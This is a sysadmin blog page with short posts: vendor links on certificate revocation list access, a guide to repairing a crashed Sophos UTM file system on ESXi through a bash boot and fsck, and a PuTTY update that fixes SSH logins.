Symantec: About the Install Readiness Check for Certificate Revocation List access

https://success.trendmicro.com/solution/1058226

TEND MICRO: After upgrading OfficeScan, users complained that the server started to rename all files in the OfficeClient Directory to "_invalid".
Below is a sample list of files in the D:\app\Trend Micro\OfficeScan\PCCSRV\Admin directory:

Checkpoint:

https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk108202

If there is no Internet connection, then CRL fetch and intermediate CA fetch will fail (this will be logged). The inspection will take place; however, URL-based or Category-based bypassing will not work.

Note: The CRL verifications are performed in the background asynchronously while matching the security policy (this mimics the behavior of the major web browsers).

Untrusted certificates and lack of CRLs can be configured as reasons to drop the connection

Mcafee:
https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25504/en_US/epo_530_pg_0-00_en-us.pdf

 

 

 

Tags:

Deployment | Microsoft SCCM/MEM/MDT | Scripting | Ivanti Frontrange Enteo | W10 | M365/AZURE | SECURITY | FW Fortigate | FW Sophos | Mcafee ENS, EPO, DLP, TIE, ATD, VSE, MSME

SOPHOS UTM 9.4 VMware on ESXi does not start after crash of ESX or Storage

by butsch 11. June 2018 00:08

SOPHOS UTM 9.4 VMware on ESXi does not start after crash of ESX or Storage

File system inconsistency - cannot run fsck

  • The console hangs at Press F2 with white Screen you can't logon or ping the machine
  • You can't connect with SSH
  • You can't acces the machine on port 4444
  • You DID not move the machine (COPY) NORE did you change something with NIC or MAC
  • You prob. had a crash on the ESXi, the storage or Disk system itself
  • You assume that Linux file system are robust and think they can't crash (Look like not…)

If you try the Rescue boot Option you should LOGON ONLY with root. However you are Windows User and always logon with admin and password through web console on port 4444. I am absolute sure there is Documentation on this and if you have Setup and read the Manual like Sophos wants you > Then you have that password.

Here is how to repair the File System with absolute almost no TUX knowledge and without having the root password! (Kind of strange but well you need physical access or console Access) so…

Error

 

Reboot the UTM machine in ESXi-console

 

Press ESC

Type "e" on keyboard once (Nothing else)

Choose the options which looks like this (similar)

If you are in the ESXi-CONSOLE end following to the command which is displayed now (At the end of existing command). Just behind the *******silent

init=/bin/bash

If you search CHARS on non us-keyboard:

On GERMAN OR SWISS GERMAN the = is right under the F10 keyboard on NON US-keyboard layouts! The "/" on the 10 numeric block.

 

PRESS "ENTER"

PRESS "b" to load the modified boot Setting

When the System stops it will stay at CLI now

Run cli command

"Fsck /dev/sda6"

or whever you corrupt file system is (It will show you in the errors as sample below)

On every question he will ask answer "y"

Comment Windows Senior System Engineer > Nobody understands what it says. Not even the guy who coded it we guess….

Reboot the System with CTRL-ALT-DEL from ESXi (Send command)

Here is how to reset Sophos passwords. We ONLY used step 1-10 for the repair of File System.

https://community.sophos.com/kb/en-us/115346#How%20to%20reset%20all%20passwords

 

 

 

 

Tags:

SECURITY | FW Sophos

SOPHOS: Unable to SSH after Update to 9.4 latest Release 9.404-5

by butsch 20. July 2016 03:35

You did all right as mentioned under but are unable to logon:

http://www.butsch.ch/post/Sophos-UTM-9314-13-Data-Disk-is-filling-up.aspx

Error: Network error:Software caused connection abort

Solution: download latest Version from Putty and it will work again

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

 

 

Tags:

SECURITY | FW Sophos



Werbung von Drittfirmen (Nicht Butsch Informatik):

Werbung von Drittfirmen via Google Adsense: